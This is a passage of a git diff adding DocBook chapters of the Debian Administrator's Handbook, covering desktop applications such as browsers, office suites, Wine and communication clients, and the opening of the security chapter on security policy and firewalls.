+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section>
+			<title>Thunderbird and Icedove</title>
+			 <para>
+				The <emphasis role="pkg">thunderbird</emphasis> package provides the email client from the Mozilla software suite. Until <emphasis role="distribution">Jessie</emphasis> Debian contained Icedove and not Thunderbird for legal reasons detailed in the sidebar <xref linkend="sidebar.firefox-iceweasel" />. You may find references to Icedove as the switch has been done recently.
+			</para>
+			 <para>
+				Various localization sets are available in <emphasis role="pkg">thunderbird-l10n-*</emphasis> packages; the <emphasis role="pkg">enigmail</emphasis> extension handles message encrypting and signing, but it is not available in all languages.
+			</para>
+			 <figure>
+				<title>The Thunderbird email software</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/thunderbird.png" format="PNG" scalefit="1" width="70%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <indexterm>
+				<primary>Thunderbird, Mozilla</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Mozilla</primary>
+				<secondary>Thunderbird</secondary>
+			</indexterm>
+
+		</section>
+
+	</section>
+	 <section id="sect.web-browsers">
+		<title>Web Browsers</title>
+		 <indexterm>
+			<primary>Web browser</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>browser, Web</primary>
+		</indexterm>
+		 <para>
+			Epiphany, the web browser in the GNOME suite, uses the WebKit display engine developed by Apple for its Safari browser. The relevant package is <emphasis role="pkg">epiphany-browser</emphasis>.
+		</para>
+		 <indexterm>
+			<primary>WebKit</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Epiphany</primary>
+		</indexterm>
+		 <para>
+			Konqueror, available in the <emphasis role="pkg">konqueror</emphasis> package, is KDE's web browser (but can also assume the role of a file manager). It uses the KDE-specific KHTML rendering engine; KHTML is an excellent engine, as witnessed by the fact that Apple's WebKit is based on KHTML. <indexterm><primary>Konqueror</primary></indexterm>
+		</para>
+		 <para>
+			Users not satisfied by either of the above can use Firefox. This browser, available in the <emphasis role="pkg">firefox-esr</emphasis> package, uses the Mozilla project's Gecko renderer, with a thin and extensible interface on top. <indexterm><primary>Gecko</primary></indexterm> <indexterm><primary>Mozilla</primary><secondary>Firefox</secondary></indexterm> <indexterm><primary>Firefox, Mozilla</primary></indexterm>
+		</para>
+		 <figure>
+			<title>The Firefox web browser</title>
+			 <mediaobject>
+				<imageobject>
+					<imagedata fileref="images/firefox.png" format="PNG" scalefit="1" width="70%" />
+				</imageobject>
+
+			</mediaobject>
+
+		</figure>
+		 <sidebar> <title><emphasis>VOCABULARY</emphasis> Firefox ESR</title>
+		 <indexterm>
+			<primary><emphasis role="pkg">firefox-esr</emphasis></primary>
+		</indexterm>
+		 <para>
+			Mozilla has a very fast-paced release cycle for Firefox. New releases are published every six to eight weeks and only the latest version is supported for security issues. This doesn't suit all kind of users so, every 10 cycles, they are promoting one of their release to an <emphasis>Extended Support Release</emphasis> (ESR) which will get security updates (and no functional changes) during the next 10 cycles (which covers a bit more than a year).
+		</para>
+		 <para>
+			Debian has both versions packaged. The ESR one, in the package <emphasis role="pkg">firefox-esr</emphasis>, is used by default since it is the only version suitable for Debian <emphasis role="distribution">Stable</emphasis> with its long support period (and even there Debian has to upgrade from one ESR release to the next multiple times during a Debian Stable lifecycle). The regular Firefox is available in the <emphasis role="pkg">firefox</emphasis> package but it is only available to users of Debian <emphasis role="distribution">Unstable</emphasis>.
+		</para>
+		 </sidebar> <sidebar id="sidebar.firefox-iceweasel"> <title><emphasis>CULTURE</emphasis> Iceweasel, Firefox and others</title>
+		 <indexterm>
+			<primary>Iceweasel</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Icedove</primary>
+		</indexterm>
+		 <para>
+			Before Debian <emphasis role="distribution">Stretch</emphasis>, Firefox and Thunderbird were missing. The <emphasis role="pkg">iceweasel</emphasis> package contained Iceweasel, which was basically Firefox under another name.
+		</para>
+		 <para>
+			The rationale behind this renaming was a result of the usage rules imposed by the Mozilla Foundation on the <trademark>Firefox</trademark> registered trademark: any software named Firefox had to use the official Firefox logo and icons. However, since these elements are not released under a free license, Debian could not distribute them in its <emphasis>main</emphasis> section. Rather than moving the whole browser to <emphasis>non-free</emphasis>, the package maintainer choose to use a different name.
+		</para>
+		 <para>
+			For similar reasons, the <trademark>Thunderbird</trademark> email client was renamed to Icedove in a similar fashion.
+		</para>
+		 <para>
+			Nowadays, the logo and icons are distributed under a free software license and Mozilla recognized that the changes made by the Debian project are respecting their trademark license so Debian is again able to ship Mozilla's applications under their official name.
+		</para>
+		 </sidebar> <indexterm>
+			<primary>Mozilla</primary>
+			<secondary>Firefox</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>Firefox, Mozilla</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>CULTURE</emphasis> Mozilla</title>
+		 <para>
+			Netscape Navigator was the standard browser when the web started reaching the masses, but lost ground when Microsoft bundled Internet Explorer with Windows and signed contracts with computer manufacturers which forbade them from pre-installing Netscape Navigator. Faced with this failure, Netscape (the company) decided to “free” its source code, by releasing it under a free license, to give it a second life. This was the beginning of the Mozilla project. After many years of development, the results are more than satisfying: the Mozilla project brought forth an HTML rendering engine (called Gecko) that is among the most standard-compliant. This rendering engine is in particular used by the Mozilla Firefox browser, which is one of the most successful browsers, with a fast-growing user base.
+		</para>
+		 <indexterm>
+			<primary>Mozilla</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Netscape</primary>
+		</indexterm>
+		 </sidebar> <para>
+			Last but not least, Debian also contains the <emphasis>Chromium</emphasis> web browser (available in the <emphasis role="pkg">chromium</emphasis> package). This browser is developed by Google at such a fast pace that maintaining a single version of it across the whole lifespan of Debian <emphasis role="distribution">Stretch</emphasis> is unlikely to be possible. Its clear purpose is to make web services more attractive, both by optimizing the browser for performance and by increasing the user's security. The free code that powers Chromium is also used by its proprietary version called Google Chrome.
+		</para>
+
+	</section>
+	 <section id="sect.development">
+		<title>Development</title>
+		 <section>
+			<title>Tools for GTK+ on GNOME</title>
+			 <para>
+				Anjuta (in the <emphasis role="pkg">anjuta</emphasis> package) and GNOME Builder (in the <emphasis role="pkg">gnome-builder</emphasis> package) are Integrated Development Environments (<acronym>IDE</acronym>) optimized for creating GTK+ applications for GNOME. Glade (in the <emphasis role="pkg">glade</emphasis> package) is an application designed to create GTK+ graphical interfaces for GNOME and save them in an XML file. These XML files can then be loaded by the GTK+ shared library though its <literal>GtkBuilder</literal> component to recreate the saved interfaces; such a feature can be interesting, for instance for plugins that require dialogs. <ulink type="block" url="https://wiki.gnome.org/Apps/Builder" /> <ulink type="block" url="http://anjuta.org/" /> <ulink type="block" url="https://glade.gnome.org/" />
+			</para>
+			 <indexterm>
+				<primary>Anjuta</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Builder, GNOME Builder</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Glade</primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>Tools for Qt</title>
+			 <para>
+				The equivalent applications for Qt applications are KDevelop by KDE (in the <emphasis role="pkg">kdevelop</emphasis> package) for the development environment, and Qt Designer (in the <emphasis role="pkg">qttools5-dev-tools</emphasis> package) for the design of graphical interfaces for Qt applications.
+			</para>
+			 <para>
+				KDevelop is also a generic IDE and provides plugins for other languages like Python and PHP and different build systems.
+			</para>
+			 <indexterm>
+				<primary>KDevelop</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Qt</primary>
+				<secondary>Designer</secondary>
+			</indexterm>
+
+		</section>
+
+	</section>
+	 <section id="sect.collaborative-work">
+		<title>Collaborative Work</title>
+		 <indexterm>
+			<primary>Collaborative Work</primary>
+		</indexterm>
+		 <section>
+			<title>Working in Groups: <foreignphrase>groupware</foreignphrase></title>
+			 <indexterm>
+				<primary><emphasis>groupware</emphasis></primary>
+			</indexterm>
+			 <para>
+				Groupware tools tend to be relatively complex to maintain because they aggregate multiple tools and have requirements that are not always easy to reconcile in the context of an integrated distribution. Thus there is a long list of groupware packages that were once available in Debian but have been dropped for lack of maintainers or incompatibility with other (newer) software in Debian. This has been the case with PHPGroupware, eGroupware, and Kolab. <ulink type="block" url="http://www.egroupware.org/" /> <ulink type="block" url="https://www.kolab.org/" />
+			</para>
+			 <indexterm>
+				<primary>eGroupware</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Kolab</primary>
+			</indexterm>
+			 <para>
+				All is not lost though. Many of the features traditionally provided by “groupware” software are increasingly integrated into “standard” software. This is reducing the requirement for specific, specialized groupware software. On the other hand, this usually requires a specific server. Citadel (in the <emphasis role="pkg">citadel-suite</emphasis> package) and Sogo (in the <emphasis role="pkg">sogo</emphasis> package) are alternatives that are available in Debian <emphasis role="distribution">Stretch</emphasis>.
+			</para>
+
+		</section>
+		 <section>
+			<title>Collaborative Work With FusionForge</title>
+			 <indexterm>
+				<primary>FusionForge</primary>
+			</indexterm>
+			 <para>
+				FusionForge is a collaborative development tool with some ancestry in SourceForge, a hosting service for free software projects. It takes the same overall approach based on the standard development model for free software. The software itself has kept evolving after the SourceForge code went proprietary. Its initial authors, VA Software, decided not to release any more free versions. The same happened again when the first fork (GForge) followed the same path. Since various people and organizations have participated in development, the current FusionForge also includes features targeting a more traditional approach to development, as well as projects not purely concerned with software development.
+			</para>
+			 <indexterm>
+				<primary>SourceForge</primary>
+			</indexterm>
+			 <para>
+				FusionForge can be seen as an amalgamation of several tools dedicated to manage, track and coordinate projects. These tools can be roughly classified into three families:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<emphasis>communication</emphasis>: web forums, mailing-list manager, and announcement system allowing a project to publish news
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<emphasis>tracking</emphasis>: tools to track project progress and schedule tasks, to track bugs, feature requests, or any other kind of “ticket”, and to run surveys
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<emphasis>sharing</emphasis>: documentation manager to provide a single central point for documents related to a project, generic file release manager, dedicated website for each project.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Since FusionForge largely targets development projects, it also integrates many tools such as CVS, Subversion, Git, Bazaar, Darcs, Mercurial and Arch for source control management (also called “configuration management” or “version control”). These programs keep a history of all the revisions of all tracked files (often source code files), with all the changes they go through, and they can merge modifications when several developers work simultaneously on the same part of a project.
+			</para>
+			 <para>
+				Most of these tools can be accessed or even managed through a web interface, with a fine-grained permission system, and email notifications for some events.
+			</para>
+			 <para>
+				Unfortunately, FusionForge is not part of Debian <emphasis role="distribution">Stretch</emphasis>. It is a large software stack that is hard to maintain properly and benefits only few users who are usually expert enough to be able to backport the package from Debian <emphasis role="distribution">Unstable</emphasis>.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.office-suites">
+		<title>Office Suites</title>
+		 <indexterm>
+			<primary>office suite</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>suite, office</primary>
+		</indexterm>
+		 <para>
+			Office software has long been seen as lacking in the free software world. Users require replacements for Microsoft tools such as Word and Excel, but these are so complex that replacements were hard to develop. The situation changed when Sun released the StarOffice code under a free license as OpenOffice, a project which later gave birth to Libre Office, which is available on Debian. The KDE project also has its own office suite, called Calligra Suite (previously KOffice), and GNOME, while never offering a comprehensive office suite, provides AbiWord as a word processor and Gnumeric as a spreadsheet. The various projects each have their strengths. For instance, the Gnumeric spreadsheet is better than OpenOffice.org/Libre Office in some domains, notably the precision of its calculations. On the word processing front, the Libre Office suite still leads the way.
+		</para>
+		 <indexterm>
+			<primary>OpenOffice.org</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>StarOffice</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Libre Office</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>GNOME Office</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Calligra Suite</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Gnumeric</primary>
+		</indexterm>
+		 <para>
+			Another important feature for users is the ability to import Microsoft Office documents. Even though all office suites have this feature, only the ones in OpenOffice.org and Libre Office are functional enough for daily use.
+		</para>
+		 <sidebar> <title><emphasis>THE BROADER VIEW</emphasis> Libre Office replaces OpenOffice.org</title>
+		 <para>
+			OpenOffice.org contributors set up a foundation (<emphasis>The Document Foundation</emphasis>) to foster the project's development. The idea had been discussed for some time, but the actual trigger was Oracle's acquisition of Sun. The new ownership made the future of OpenOffice under Oracle uncertain. Since Oracle declined to join the foundation, the developers had to give up on the OpenOffice.org name. This office suite is now known as <emphasis>Libre Office</emphasis>, and is available in Debian.
+		</para>
+		 <para>
+			After a period of relative stagnation on OpenOffice.org, Oracle donated the code and associated rights to the Apache Software Foundation, and OpenOffice is now an Apache project. This project is not currently available in Debian and is rather moribund when compared to Libre Office.
+		</para>
+		 </sidebar> <indexterm>
+			<primary>Word, Microsoft</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Excel, Microsoft</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Microsoft</primary>
+			<secondary>Word</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>Microsoft</primary>
+			<secondary>Excel</secondary>
+		</indexterm>
+		 <para>
+			Libre Office and Calligra Suite are available in the <emphasis role="pkg">libreoffice</emphasis> and <emphasis role="pkg">calligra</emphasis> Debian packages, respectively. Although the <emphasis role="pkg">gnome-office</emphasis> package was previously used to install a collection of office tools such as AbiWord and Gnumeric, this package is no longer part of Debian, with the individual packages now standing on their own.
+		</para>
+		 <para>
+			Language-specific packs for Libre Office are distributed in separate packages, most notably <emphasis role="pkg">libreoffice-l10n-*</emphasis> and <emphasis role="pkg">libreoffice-help-*</emphasis>. Some features such as spelling dictionaries, hyphenation patterns and thesauri are in separate packages, such as <emphasis role="pkg">myspell-*</emphasis>, <emphasis role="pkg">hunspell-*</emphasis>, <emphasis role="pkg">hyphen-*</emphasis> and <emphasis role="pkg">mythes-*</emphasis>.
+		</para>
+
+	</section>
+	 <section id="sect.windows-emulation">
+		<title>Emulating Windows: Wine</title>
+		 <indexterm>
+			<primary>Emulating Windows</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Windows, emulation</primary>
+		</indexterm>
+		 <para>
+			In spite of all the previously mentioned efforts, there are still a number of tools without a Linux equivalent, or for which the original version is absolutely required. This is where Windows emulation systems come in handy. The most well-known among them is Wine. <ulink type="block" url="https://www.winehq.org/" />
+		</para>
+		 <sidebar> <title><emphasis>COMPLEMENTS</emphasis> CrossOver Linux</title>
+		 <para>
+			<emphasis>CrossOver</emphasis>, produced by CodeWeavers, is a set of enhancements to Wine that broadens the available set of emulated features to a point at which Microsoft Office becomes fully usable. Some of the enhancements are periodically merged into Wine. <ulink type="block" url="https://www.codeweavers.com/products/" />
+		</para>
+		 <indexterm>
+			<primary><emphasis>CrossOver</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>CodeWeavers</primary>
+		</indexterm>
+		 </sidebar> <para>
+			However, one should keep in mind that it is only a solution among others, and the problem can also be tackled with a virtual machine or VNC; both of these solutions are detailed in the sidebars <xref linkend="sidebar.virtual-machines" /> and <xref linkend="sidebar.wts-or-vnc" />.
+		</para>
+		 <para>
+			Let us start with a reminder: emulation allows executing a program (developed for a target system) on a different host system. The emulation software uses the host system, where the application runs, to imitate the required features of the target system.
+		</para>
+		 <indexterm>
+			<primary>Wine</primary>
+		</indexterm>
+		 <para>
+			Now let's install the required packages (<emphasis role="pkg">ttf-mscorefonts-installer</emphasis> is in the contrib section):
+		</para>
+		 
+<screen>
+<computeroutput># </computeroutput><userinput>apt install wine ttf-mscorefonts-installer</userinput></screen>
+		 <indexterm>
+			<primary><command>winecfg</command></primary>
+		</indexterm>
+		 <para>
+			On a 64 bit (amd64) system, if your Windows applications are 32 bit applications, then you will have to enable multi-arch to be able to install wine32 from the i386 architecture (see <xref linkend="sect.multi-arch" />).
+		</para>
+		 <para>
+			The user then needs to run <command>winecfg</command> and configure which (Debian) locations are mapped to which (Windows) drives. <command>winecfg</command> has some sane defaults and can autodetect some more drives; note that even if you have a dual-boot system, you should not point the <literal>C:</literal> drive at where the Windows partition is mounted in Debian, as Wine is likely to overwrite some of the data on that partition, making Windows unusable. Other settings can be kept to their default values. To run Windows programs, you will first need to install them by running their (Windows) installer under Wine, with a command such as <command>wine <replaceable>.../setup.exe</replaceable></command>; once the program is installed, you can run it with <command>wine <replaceable>.../program.exe</replaceable></command>. The exact location of the <filename>program.exe</filename> file depends on where the <literal>C:</literal> drive is mapped; in many cases, however, simply running <command>wine <replaceable>program</replaceable></command> will work, since the program is usually installed in a location where Wine will look for it by itself.
+		</para>
+		 <sidebar> <title><emphasis>TIP</emphasis> Working around a winecfg failure</title>
+		 <para>
+			In some cases, <command>winecfg</command> (which is just a wrapper) might fail. As a work-around, it is possible to try to run the underlying command manually: <command>wine64 /usr/lib/x86_64-linux-gnu/wine/wine/winecfg.exe.so</command> or <command>wine32 /usr/lib/i386-linux-gnu/wine/wine/winecfg.exe.so</command>.
+		</para>
+		 </sidebar> <para>
+			Note that you should not rely on Wine (or similar solutions) without actually testing the particular software: only a real-use test will determine conclusively whether emulation is fully functional.
+		</para>
+		 <sidebar id="sidebar.virtual-machines"> <title><emphasis>ALTERNATIVE</emphasis> Virtual machines</title>
+		 <para>
+			An alternative to emulating Microsoft's operating system is to actually run it in a virtual machine that emulates a full hardware machine. This allows running any operating system. <xref linkend="advanced-administration" /> describes several virtualization systems, most notably Xen and KVM (but also QEMU, VMWare and Bochs).
+		</para>
+		 </sidebar> <sidebar id="sidebar.wts-or-vnc"> <title><emphasis>ALTERNATIVE</emphasis> <foreignphrase>Windows Terminal Server</foreignphrase> or VNC</title>
+		 <para>
+			Yet another possibility is to remotely run the legacy Windows applications on a central server with <emphasis>Windows Terminal Server</emphasis> and access the application from Linux machines using <emphasis>rdesktop</emphasis>. This is a Linux client for the RDP protocol (<emphasis>Remote Desktop Protocol</emphasis>) that <foreignphrase>Windows NT/2000 Terminal Server</foreignphrase> uses to display desktops on remote machines.
+		</para>
+		 <indexterm>
+			<primary>RDP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>Remote Desktop Protocol</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>Windows Terminal Server</emphasis></primary>
+		</indexterm>
+		 <para>
+			The VNC software provides similar features, with the added benefit of also working with many operating systems. Linux VNC clients and servers are described in <xref linkend="sect.remote-login" />.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.rtc-clients">
+		<title>Real-Time Communications software</title>
+		 <para>
+			Debian provides a wide range of Real-Time Communications (RTC) client software. The setup of RTC servers is discussed in <xref linkend="sect.rtc-services" />. In SIP terminology, a client application or device is also referred to as a user agent.
+		</para>
+		 <indexterm>
+			<primary>User agent (SIP)</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>SIP</primary>
+			<secondary>user agent</secondary>
+		</indexterm>
+		 <para>
+			Each client application varies in functionality. Some applications are more convenient for intensive chat users while other applications are more stable for webcam users. It may be necessary to test several applications to identify those which are most satisfactory. A user may finally decide that they need more than one application, for example, an XMPP application for messaging with customers and an IRC application for collaboration with some online communities.
+		</para>
+		 <para>
+			To maximize the ability of users to communicate with the wider world, it is recommended to configure both SIP and XMPP clients or a single client that supports both protocols.
+		</para>
+		 <indexterm>
+			<primary>SIP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>XMPP</primary>
+		</indexterm>
+		 <para>
+			The default GNOME desktop suggests the Empathy communications client. Empathy can support both SIP and XMPP. It supports instant messaging (IM), voice and video. The KDE project provides KDE Telepathy, a communications client based on the same underlying Telepathy APIs used by the GNOME Empathy client.
+		</para>
+		 <indexterm>
+			<primary>Empathy</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Telepathy</primary>
+		</indexterm>
+		 <para>
+			Popular alternatives to Empathy/Telepathy include Ekiga, Linphone, Psi and Ring (formerly known as SFLphone).
+		</para>
+		 <indexterm>
+			<primary>Ekiga</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Linphone</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Psi</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Ring (soft-phone)</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>SFLphone</primary>
+		</indexterm>
+		 <para>
+			Some of these applications can also interact with mobile users using apps such as Lumicall on Android. <ulink type="block" url="https://lumicall.org" />
+		</para>
+		 <indexterm>
+			<primary>Lumicall</primary>
+		</indexterm>
+		 <para>
+			The <emphasis>Real-Time Communications Quick Start Guide</emphasis> has a chapter dedicated to client software. <ulink type="block" url="http://rtcquickstart.org/guide/multi/useragents.html" />
+		</para>
+		 <sidebar> <title><emphasis>TIP</emphasis> Look for clients supporting ICE and TURN</title>
+		 <para>
+			Some RTC clients have significant problems sending voice and video through firewalls and NAT networks. Users may receive ghost calls (their phone rings but they don't hear the other person) or they may not be able to call at all.
+		</para>
+		 <para>
+			The ICE and TURN protocols were developed to resolve these issues. Operating a TURN server with public IP addresses in each site and using client software that supports both ICE and TURN gives the best user experience.
+		</para>
+		 <para>
+			If the client software is only intended for instant messaging, there is no requirement for ICE or TURN support.
+		</para>
+		 </sidebar> <para>
+			Debian Developers operate a community SIP service at <ulink url="https://rtc.debian.org">rtc.debian.org</ulink>. The community maintains a wiki with documentation about setting up many of the client applications packaged in Debian. The wiki articles and screenshots are a useful resource for anybody setting up a similar service on their own domain. <ulink type="block" url="https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide" />
+		</para>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Internet Relay Chat</title>
+		 <para>
+			IRC can also be considered, in addition to SIP and XMPP. IRC is more oriented around the concept of channels, the name of which starts with a hash sign <literal>#</literal>. Each channel is usually targeted at a specific topic and any number of people can join a channel to discuss it (but users can still have one-to-one private conversations if needed). The IRC protocol is older, and does not allow end-to-end encryption of the messages; it is still possible to encrypt the communications between the users and the server by tunneling the IRC protocol inside SSL.
+		</para>
+		 <indexterm>
+			<primary>IRC</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><foreignphrase>Internet Relay Chat</foreignphrase></primary>
+		</indexterm>
+		 <para>
+			IRC clients are a bit more complex, and they usually provide many features that are of limited use in a corporate environment. For instance, channel “operators” are users endowed with the ability to kick other users from a channel, or even ban them permanently, when the normal discussion is disrupted.
+		</para>
+		 <para>
+			Since the IRC protocol is very old, many clients are available to cater for many user groups; examples include XChat (only available in <emphasis role="distribution">stretch-backports</emphasis>, not in <emphasis role="distribution">stretch</emphasis>), and Smuxi (graphical clients based on GTK+), Irssi (text mode), Circe (integrated to Emacs), and so on.
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>QUICK LOOK</emphasis> Video conferencing with Ekiga</title>
+		 <para>
+			Ekiga (formerly GnomeMeeting) is a prominent application for Linux video conferencing. It is both stable and functional, and is very easily used on a local network; setting up the service on a global network is much more complex when the firewalls involved lack explicit support for the H323 and/or SIP teleconferencing protocols with all their quirks.
+		</para>
+		 <indexterm>
+			<primary>video conference</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>H323</primary>
+		</indexterm>
+		 <para>
+			If only one Ekiga client is to run behind the firewall, the configuration is rather straightforward, and only involves forwarding a few ports to the dedicated host: TCP port 1720 (listening for incoming connections), TCP port 5060 (for SIP), TCP ports 30000 to 30010 (for control of open connections) and UDP ports 5000 to 5100 (for audio and video data transmission and registration to an H323 proxy).
+		</para>
+		 <indexterm>
+			<primary>GnomeMeeting</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Ekiga</primary>
+		</indexterm>
+		 <para>
+			When several Ekiga clients are to run behind the firewall, complexity increases notably. An H323 proxy (for instance the <emphasis role="pkg">gnugk</emphasis> package) must be set up, and its configuration is far from simple.
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">gnugk</emphasis></primary>
+		</indexterm>
+		 </sidebar>
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/14_security.xml b/tmp/cs-CZ/xml/14_security.xml
new file mode 100644
index 000000000..0b2567a4d
--- /dev/null
+++ b/tmp/cs-CZ/xml/14_security.xml
@@ -0,0 +1,2010 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="security" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Firewall</keyword>
+			 <keyword>Netfilter</keyword>
+			 <keyword>IDS/NIDS</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Security</title>
+	 <highlights> <para>
+		An information system can have a varying level of importance depending on the environment. In some cases, it is vital to a company's survival. It must therefore be protected from various kinds of risks. The process of evaluating these risks, defining and implementing the protection is collectively known as the “security process”.
+	</para>
+	 </highlights> <section id="sect.defining-security-policy">
+		<title>Defining a Security Policy</title>
+		 <sidebar> <title><emphasis>CAUTION</emphasis> Scope of this chapter</title>
+		 <para>
+			Security is a vast and very sensitive subject, so we cannot claim to describe it in any kind of comprehensive manner in the course of a single chapter. We will only delineate a few important points and describe some of the tools and methods that can be of use in the security domain. For further reading, literature abounds, and entire books have been devoted to the subject. An excellent starting point would be <citetitle>Linux Server Security</citetitle> by Michael D. Bauer (published by O'Reilly).
+		</para>
+		 </sidebar> <para>
+			The word “security” itself covers a vast range of concepts, tools and procedures, none of which apply universally. Choosing among them requires a precise idea of what your goals are. Securing a system starts with answering a few questions. Rushing headlong into implementing an arbitrary set of tools runs the risk of focusing on the wrong aspects of security.
+		</para>
+		 <para>
+			The very first thing to determine is therefore the goal. A good approach to help with that determination starts with the following questions:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					<emphasis>What</emphasis> are we trying to protect? The security policy will be different depending on whether we want to protect computers or data. In the latter case, we also need to know which data.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					What are we trying to protect <emphasis>against</emphasis>? Is it leakage of confidential data? Accidental data loss? Revenue loss caused by disruption of service?
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					Also, <emphasis>who</emphasis> are we trying to protect against? Security measures will be quite different for guarding against a typo by a regular user of the system than they would be when protecting against a determined attacker group.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			The term “risk” is customarily used to refer collectively to these three factors: what to protect, what needs to be prevented from happening, and who will try to make it happen. Modeling the risk requires answers to these three questions. From this risk model, a security policy can be constructed, and the policy can be implemented with concrete actions.
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Permanent questioning</title>
+		 <para>
+			Bruce Schneier, a world expert in security matters (not only computer security) tries to counter one of security's most important myths with a motto: “Security is a process, not a product”. Assets to be protected change in time, and so do threats and the means available to potential attackers. Even if a security policy has initially been perfectly designed and implemented, one should never rest on one's laurels. The risk components evolve, and the response to that risk must evolve accordingly.
+		</para>
+		 </sidebar> <para>
+			Extra constraints are also worth taking into account, as they can restrict the range of available policies. How far are we willing to go to secure a system? This question has a major impact on the policy to implement. The answer is too often only defined in terms of monetary costs, but the other elements should also be considered, such as the amount of inconvenience imposed on system users or performance degradation.
+		</para>
+		 <para>
+			Once the risk has been modeled, one can start thinking about designing an actual security policy.
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Extreme policies</title>
+		 <para>
+			There are cases where the choice of actions required to secure a system is extremely simple.
+		</para>
+		 <para>
+			For instance, if the system to be protected only comprises a second-hand computer, the sole use of which is to add a few numbers at the end of the day, deciding not to do anything special to protect it would be quite reasonable. The intrinsic value of the system is low. The value of the data is zero since they are not stored on the computer. A potential attacker infiltrating this “system” would only gain an unwieldy calculator. The cost of securing such a system would probably be greater than the cost of a breach.
+		</para>
+		 <para>
+			At the other end of the spectrum, we might want to protect the confidentiality of secret data in the most comprehensive way possible, trumping any other consideration. In this case, an appropriate response would be the total destruction of these data (securely erasing the files, shredding of the hard disks to bits, then dissolving these bits in acid, and so on). If there is an additional requirement that data must be kept in store for future use (although not necessarily readily available), and if cost still isn't a factor, then a starting point would be storing the data on iridium–platinum alloy plates stored in bomb-proof bunkers under various mountains in the world, each of which being (of course) both entirely secret and guarded by entire armies…
+		</para>
+		 <para>
+			Extreme though these examples may seem, they would nevertheless be an adequate response to defined risks, insofar as they are the outcome of a thought process that takes into account the goals to reach and the constraints to fulfill. When coming from a reasoned decision, no security policy is less respectable than any other.
+		</para>
+		 </sidebar> <para>
+			In most cases, the information system can be segmented in consistent and mostly independent subsets. Each subsystem will have its own requirements and constraints, and so the risk assessment and the design of the security policy should be undertaken separately for each. A good principle to keep in mind is that a short and well-defined perimeter is easier to defend than a long and winding frontier. The network organization should also be designed accordingly: the sensitive services should be concentrated on a small number of machines, and these machines should only be accessible via a minimal number of check-points; securing these check-points will be easier than securing all the sensitive machines against the entirety of the outside world. It is at this point that the usefulness of network filtering (including by firewalls) becomes apparent. This filtering can be implemented with dedicated hardware, but a possibly simpler and more flexible solution is to use a software firewall such as the one integrated in the Linux kernel.
+		</para>
+
+	</section>
+	 <section id="sect.firewall-packet-filtering">
+		<title>Firewall or Packet Filtering</title>
+		 <indexterm>
+			<primary>firewall</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>packet filter</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Firewall</title>
+		 <indexterm>
+			<primary>packet</primary>
+			<secondary>IP</secondary>
+		</indexterm>
+		 <para>
+			A <emphasis>firewall</emphasis> is a piece of computer equipment with hardware and/or software that sorts the incoming or outgoing network packets (coming to or from a local network) and only lets through those matching certain predefined conditions.
+		</para>
+		 </sidebar> <para>
+			A firewall is a filtering network gateway and is only effective on packets that must go through it. Therefore, it can only be effective when going through the firewall is the only route for these packets.
+		</para>
+		 <para>
